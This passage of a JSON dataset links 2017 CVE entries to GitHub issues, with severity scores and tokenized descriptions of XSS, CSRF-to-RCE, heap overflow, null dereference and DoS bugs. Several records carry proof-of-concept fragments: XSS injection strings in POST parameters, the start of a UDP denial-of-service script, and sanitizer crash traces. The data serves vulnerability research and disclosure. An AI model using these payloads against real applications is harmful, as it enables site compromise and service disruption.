        "Repo_new": "tatsh/pngdefry",
        "Issue_Created_At": "2017-03-22T17:16:53Z",
        "description": "Heap Buffer Overflow Vulnerability in Pngdefry. This is to report a heap overflow vulnerability in Pngdefry. This issue affects the APITAG function of the 'pngdefry.c' source file. Valgrind reports Invalid write of size NUMBERTAG and Invalid read of size NUMBERTAG To reproduce this issue open the 'png file' with Pngdefry application. POC files attached below: FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-7235",
        "Issue_Url_old": "https://github.com/Anorov/cloudflare-scrape/issues/97",
        "Issue_Url_new": "https://github.com/anorov/cloudflare-scrape/issues/97",
        "Repo_new": "anorov/cloudflare-scrape",
        "Issue_Created_At": "2017-03-22T03:37:37Z",
        "description": "Call APITAG My recommendation would be to remove the dependency on APITAG , but it looks like you don't want to go that way APITAG see this comment URLTAG , at least disable the pyimport statement, since it gives arbitrary code execution to any website that's scraped. And add the disclaimer that this library runs arbitrary code back to the README (which was removed in this commit URLTAG . You should also request a CVE ID.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7247",
        "Issue_Url_old": "https://github.com/WhatCD/Gazelle/issues/114",
        "Issue_Url_new": "https://github.com/whatcd/gazelle/issues/114",
        "Repo_new": "whatcd/gazelle",
        "Issue_Created_At": "2017-03-13T17:58:17Z",
        "description": "Gazelle \u2013 Cross Site Scripting (XSS) in APITAG Product: Gazelle Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in APITAG latest version\u201d, which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG Post: torrents= APITAG APITAG alert NUMBERTAG APITAG APITAG To FILETAG NUMBERTAG Post: size= \" /> APITAG alert NUMBERTAG APITAG <input text=\"type To FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7248",
        "Issue_Url_old": "https://github.com/WhatCD/Gazelle/issues/111",
        "Issue_Url_new": "https://github.com/whatcd/gazelle/issues/111",
        "Repo_new": "whatcd/gazelle",
        "Issue_Created_At": "2017-03-13T17:55:06Z",
        "description": "Gazelle \u2013 Cross Site Scripting (XSS) in APITAG Product: Gazelle Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG latest version\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201ctype\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7249",
        "Issue_Url_old": "https://github.com/WhatCD/Gazelle/issues/112",
        "Issue_Url_new": "https://github.com/whatcd/gazelle/issues/112",
        "Repo_new": "whatcd/gazelle",
        "Issue_Created_At": "2017-03-13T17:56:17Z",
        "description": "Gazelle \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: Gazelle Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in APITAG latest version\u201d, which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7250",
        "Issue_Url_old": "https://github.com/WhatCD/Gazelle/issues/113",
        "Issue_Url_new": "https://github.com/whatcd/gazelle/issues/113",
        "Repo_new": "whatcd/gazelle",
        "Issue_Created_At": "2017-03-13T17:56:57Z",
        "description": "Gazelle \u2013 Cross Site Scripting (XSS) in APITAG Product: Gazelle Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG latest version\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201caction\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7251",
        "Issue_Url_old": "https://github.com/pi-engine/pi/issues/1523",
        "Issue_Url_new": "https://github.com/pi-engine/pi/issues/1523",
        "Repo_new": "pi-engine/pi",
        "Issue_Created_At": "2017-03-08T14:24:46Z",
        "description": "pi engine/pi \u2013 Cross Site Scripting (XSS). Product: pi engine/pi Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in \u201cpi engine/pi NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cpreview\u201d HTTP POST parameter passed to the the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: Post: preview=> APITAG alert NUMBERTAG APITAG < To FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7274",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/7152",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7152",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2017-03-27T08:28:17Z",
        "description": "Null pointer dereference in APITAG Null pointer dereference in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-7297",
        "Issue_Url_old": "https://github.com/rancher/rancher/issues/8296",
        "Issue_Url_new": "https://github.com/rancher/rancher/issues/8296",
        "Repo_new": "rancher/rancher",
        "Issue_Created_At": "2017-03-24T18:26:15Z",
        "description": "Security Exposure: Any authenticated users can disable auth via API. Rancher Versions: Server NUMBERTAG Docker Version: Any OS and where are the hosts located? (cloud, bare metal, etc): Setup Details: (single node rancher vs. HA rancher, internal DB vs. external DB) Environment Type: ( PATHTAG ) Steps to Reproduce: Log into Rancher as an authenticated user (any role) and disable auth via the API. Results: Authentication is disabled.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7386",
        "Issue_Url_old": "https://github.com/citymont/symetrie/issues/3",
        "Issue_Url_new": "https://github.com/citymont/symetrie/issues/3",
        "Repo_new": "citymont/symetrie",
        "Issue_Created_At": "2017-03-24T03:24:50Z",
        "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability. The vulnerability exists due to insufficient filtration of user supplied data in \"model\" HTTP parameter that will be passed to \" PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG PATHTAG NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 sp NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7387",
        "Issue_Url_old": "https://github.com/TheFirstQuestion/HelpMeWatchWho/issues/1",
        "Issue_Url_new": "https://github.com/thefirstquestion/helpmewatchwho/issues/1",
        "Repo_new": "thefirstquestion/helpmewatchwho",
        "Issue_Created_At": "2017-03-24T04:58:11Z",
        "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP parameter that will be passed to APITAG APITAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 sp NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7388",
        "Issue_Url_old": "https://github.com/micwallace/wallacepos/issues/84",
        "Issue_Url_new": "https://github.com/micwallace/wallacepos/issues/84",
        "Repo_new": "micwallace/wallacepos",
        "Issue_Created_At": "2017-03-28T15:31:12Z",
        "description": "wallacepos \u2013 Cross Site Scripting (XSS). Product: wallacepos Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in \u201cwallacepos NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201ctoken\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7389",
        "Issue_Url_old": "https://github.com/gunet/openeclass/issues/11",
        "Issue_Url_new": "https://github.com/gunet/openeclass/issues/11",
        "Repo_new": "gunet/openeclass",
        "Issue_Created_At": "2017-03-28T17:54:13Z",
        "description": "openeclass\u2013 Multiple Cross Site Scripting (XSS). Product: openeclass Download: URLTAG Vunlerable Version: Release NUMBERTAG and probably prior Tested Version: Release NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in \u201copeneclass APITAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7390",
        "Issue_Url_old": "https://github.com/andreas83/SocialNetwork/issues/84",
        "Issue_Url_new": "https://github.com/andreas83/socialnetwork/issues/84",
        "Repo_new": "andreas83/socialnetwork",
        "Issue_Created_At": "2017-03-23T12:41:11Z",
        "description": "APITAG \u2013 Cross Site Scripting (XSS). Product: APITAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cmail\u201d HTTP POST parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: Post: mail=\" /> APITAG alert NUMBERTAG APITAG <input type=\"text To FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7391",
        "Issue_Url_old": "https://github.com/dweeves/magmi-git/issues/522",
        "Issue_Url_new": "https://github.com/dweeves/magmi-git/issues/522",
        "Repo_new": "dweeves/magmi-git",
        "Issue_Created_At": "2017-03-18T14:45:05Z",
        "description": "Magmi \u2013 Cross Site Scripting (XSS). Product: Magmi Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cprefix\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7401",
        "Issue_Url_old": "https://github.com/collectd/collectd/issues/2174",
        "Issue_Url_new": "https://github.com/collectd/collectd/issues/2174",
        "Repo_new": "collectd/collectd",
        "Issue_Created_At": "2017-02-13T14:17:14Z",
        "description": "Endless loop in APITAG while statement (CPU drain). Version of collectd NUMBERTAG Operating system / distribution: Linux laptop NUMBERTAG generic NUMBERTAG Ubuntu SMP Wed Jan NUMBERTAG UTC NUMBERTAG APITAG Expected behavior Working as usual Actual behavior After sending this payload, collectd seems to be entering endless APITAG loop in packet_parse consuming high CPU resources, possibly crash/gets killed after a while. Tasks NUMBERTAG total NUMBERTAG running NUMBERTAG sleeping NUMBERTAG stopped NUMBERTAG zombie APITAG NUMBERTAG us NUMBERTAG sy NUMBERTAG ni NUMBERTAG id NUMBERTAG wa NUMBERTAG hi NUMBERTAG si NUMBERTAG st APITAG Mem NUMBERTAG total NUMBERTAG free NUMBERTAG used NUMBERTAG buff/cache APITAG Swap NUMBERTAG total NUMBERTAG free NUMBERTAG used NUMBERTAG avail Mem PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND NUMBERTAG collectd NUMBERTAG S NUMBERTAG collectd Steps to reproduce Below is a packet, python program that crafts the packet that causes this problem. dos.py import socket UDP_IP = APITAG UDP_PORT NUMBERTAG print \"UDP target IP:\", UDP_IP print \"UDP target port:\", UDP_PORT sock = APITAG Internet APITAG UDP PATHTAG APITAG UDP_PORT))",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-7446",
        "Issue_Url_old": "https://github.com/albandes/helpdezk/issues/2",
        "Issue_Url_new": "https://github.com/albandes/helpdezk/issues/2",
        "Repo_new": "albandes/helpdezk",
        "Issue_Created_At": "2017-04-05T13:40:24Z",
        "description": "Multiple CSRF Remote Code Execution Vulnerability on APITAG NUMBERTAG Exploit Title : CSRF Remote Code Execution Vulnerability on APITAG NUMBERTAG Date NUMBERTAG April NUMBERTAG Exploit Author : MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG MENTIONTAG Vendor Homepage : FILETAG Software Link : FILETAG Version NUMBERTAG Tested on : Windows Server NUMBERTAG Datacenter Evaluation CVSS: PATHTAG NUMBERTAG CRITICAL) I. Background: APITAG is a powerfull software that manages requests/incidents. It has all the needed requirements to an efficient workflow management of all processes involved in service execution. This control is done for internal demands and also for outsourced services. APITAG can be used at any company's area, serving as an support to the shared service center concept, beyond the ability to log all the processes and maintain the request's history, it can pass it through many approval levels. APITAG can put together advanced managing resources with an extremely easy use. Simple and intuitive screens make the day by day easier for your team, speeding up the procedures and saving up a lot of time. It is developped in objects oriented PHP language, with the MVC architecture and uses the templates system SMARTY. For the javascripts, JQUERY is used. II. Description: Cross Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application. APITAG have role for type person:_ admin NUMBERTAG user NUMBERTAG operator NUMBERTAG costumer NUMBERTAG partner NUMBERTAG group NUMBERTAG III. Exploit: \u2014> The first CSRF Target is: PATHTAG /person/\u201d APITAG Records People & Companies) The guest (no have account) can make admin privilege with CSRF Remote Code Execution. This is script for make account admin: ERRORTAG \u2014> The second CSRF target is: /admin/home /logos/ APITAG Config Logos) If we have minimum low privilege, we can remote code execute to make shell on module logos APITAG of Page Header, Login Page and Reports Logo). The APITAG unrestricted file extension but normally access only for admin. If you have low privilege, please choose which one to execute this code (before execute, you shall login into application):\u2028 ERRORTAG \u2014\u2014\u2014\u2014 ERRORTAG \u2014\u2014\u2014\u2014\u2014\u2014\u2014 ERRORTAG \u2014\u2014\u2014\u2014 If you have executed and success, check your file on: URLTAG and PWN ^_^ URLTAG Refer: URLTAG URLTAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-7448",
        "Issue_Url_old": "https://github.com/dropbox/lepton/issues/86",
        "Issue_Url_new": "https://github.com/dropbox/lepton/issues/86",
        "Repo_new": "dropbox/lepton",
        "Issue_Created_At": "2017-03-31T16:43:13Z",
        "description": "SIGFPE has been triggered when process malformed JPG file. Hello, the attachments are some samples that can cause SIGFPE that caused by devided by zero at PATHTAG This exception can cause Denial of Service of lepton. FILETAG You can reproduce it with: ./lepton FILETAG Here are the debugging info with gdb: APITAG NUMBERTAG for (int cmp NUMBERTAG cmp APITAG max_cmp_bc NUMBERTAG bc_allocated = max_cmp_bc (max_cmp_bc % APITAG NUMBERTAG if (cmp == desired_cmp) { APITAG NUMBERTAG fffdf7fde NUMBERTAG fffdf7fde NUMBERTAG ad \u25c2\u2014 test rax, ra NUMBERTAG fffdf7fde NUMBERTAG fffdf7fde NUMBERTAG fff NUMBERTAG fffdf7fdea NUMBERTAG fffdf7fdea NUMBERTAG a NUMBERTAG fffdf7fdeb NUMBERTAG fffdf7fdeb NUMBERTAG APITAG \u25c2\u2014 mov byte ptr [rsp NUMBERTAG APITAG \u25ba f NUMBERTAG b NUMBERTAG a f NUMBERTAG b NUMBERTAG a f NUMBERTAG efb setup_imginfo_jpg(bool NUMBERTAG f NUMBERTAG cc2b f NUMBERTAG dd NUMBERTAG f NUMBERTAG dd NUMBERTAG f NUMBERTAG ae f NUMBERTAG aa7 f NUMBERTAG ffff NUMBERTAG libc_start_main NUMBERTAG Program received signal SIGFPE pwndbg> p total_req_blocks NUMBERTAG pwndbg> bt NUMBERTAG b NUMBERTAG a in APITAG (memory_optimized=false, framebuffer NUMBERTAG c NUMBERTAG APITAG , desired_cmp NUMBERTAG this NUMBERTAG c NUMBERTAG APITAG ) at PATHTAG NUMBERTAG APITAG (this NUMBERTAG c NUMBERTAG APITAG , cmpinfo=..., cmpc NUMBERTAG mcuh=<optimized out>, mcuv=<optimized out>, APITAG out>) at PATHTAG NUMBERTAG efb in setup_imginfo_jpg APITAG at PATHTAG NUMBERTAG cc2b in read_jpeg APITAG APITAG out>, jpg_in NUMBERTAG fffffffd NUMBERTAG at PATHTAG NUMBERTAG dd NUMBERTAG in std::function<bool APITAG const (this NUMBERTAG fffffffd9a0) at PATHTAG NUMBERTAG execute(std::function<bool ()> const&) (function=...) at PATHTAG NUMBERTAG ae in process_file (reader=reader APITAG writer=writer APITAG APITAG force_zlib0=<optimized out>) at PATHTAG NUMBERTAG aa7 in app_main (argc NUMBERTAG argv=<optimized out>) at PATHTAG NUMBERTAG ffff NUMBERTAG in __libc_start_main (main NUMBERTAG main(int, char )>, argc NUMBERTAG arg NUMBERTAG fffffffdc NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffdc NUMBERTAG at PATHTAG NUMBERTAG in _start ()",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-7452",
        "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/8",
        "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/8",
        "Repo_new": "jsummers/imageworsener",
        "Issue_Created_At": "2017-04-03T06:06:01Z",
        "description": "NULL pointer dereference in iwbmp_read_info_header. on APITAG NUMBERTAG imagew $FILE FILETAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG bp NUMBERTAG fffaaf NUMBERTAG fb0 sp NUMBERTAG fffaaf NUMBERTAG d NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG in iwbmp_read_info_header PATHTAG NUMBERTAG in iw_read_bmp_file PATHTAG NUMBERTAG c NUMBERTAG in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG f NUMBERTAG fb NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG bbeb in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in iwbmp_read_info_header NUMBERTAG ABORTING testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-7453",
        "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/9",
        "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/9",
        "Repo_new": "jsummers/imageworsener",
        "Issue_Created_At": "2017-04-03T06:07:11Z",
        "description": "NULL pointer dereference in iwgif_record_pixel. on APITAG NUMBERTAG imagew $FILE FILETAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG eb bp NUMBERTAG fff NUMBERTAG bfd4b0 sp NUMBERTAG fff NUMBERTAG bfd NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG ea in iwgif_record_pixel PATHTAG NUMBERTAG in lzw_emit_code PATHTAG NUMBERTAG ea in lzw_process_code PATHTAG NUMBERTAG dd0 in lzw_process_bytes PATHTAG NUMBERTAG d0 in iwgif_read_image PATHTAG NUMBERTAG in iwgif_read_main PATHTAG NUMBERTAG bdd in iw_read_gif_file PATHTAG NUMBERTAG c NUMBERTAG in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG a8b NUMBERTAG in __libc_start_main APITAG NUMBERTAG bbeb in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in iwgif_record_pixel testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2017-7454",
        "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/11",
        "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/11",
        "Repo_new": "jsummers/imageworsener",
        "Issue_Created_At": "2017-04-03T06:08:23Z",
        "description": "heap buffer overflow in iwgif_record_pixel. on APITAG NUMBERTAG imagew $FILE FILETAG APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG b bp NUMBERTAG ffe NUMBERTAG f NUMBERTAG sp NUMBERTAG ffe NUMBERTAG f NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG a in iwgif_record_pixel PATHTAG NUMBERTAG in lzw_emit_code PATHTAG NUMBERTAG cc in lzw_process_code PATHTAG NUMBERTAG dd0 in lzw_process_bytes PATHTAG NUMBERTAG d0 in iwgif_read_image PATHTAG NUMBERTAG in iwgif_read_main PATHTAG NUMBERTAG bdd in iw_read_gif_file PATHTAG NUMBERTAG c NUMBERTAG in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG f NUMBERTAG dcbcb NUMBERTAG in __libc_start_main APITAG NUMBERTAG bbeb in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG e0ad6 in malloc PATHTAG NUMBERTAG b7b in my_mallocfn PATHTAG NUMBERTAG aa NUMBERTAG a in iw_malloc_ex PATHTAG NUMBERTAG aa3b0 in iw_malloc PATHTAG NUMBERTAG fa in iwgif_make_row_pointers PATHTAG NUMBERTAG fac in iwgif_read_image PATHTAG NUMBERTAG in iwgif_read_main PATHTAG NUMBERTAG bdd in iw_read_gif_file PATHTAG NUMBERTAG c NUMBERTAG in iw_read_file_by_fmt PATHTAG NUMBERTAG fbe in iwcmd_run PATHTAG NUMBERTAG in iwcmd_main PATHTAG NUMBERTAG f1 in main PATHTAG NUMBERTAG f NUMBERTAG dcbcb NUMBERTAG in __libc_start_main APITAG SUMMARY: APITAG heap buffer overflow PATHTAG in iwgif_record_pixel Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa]fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING testcase: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
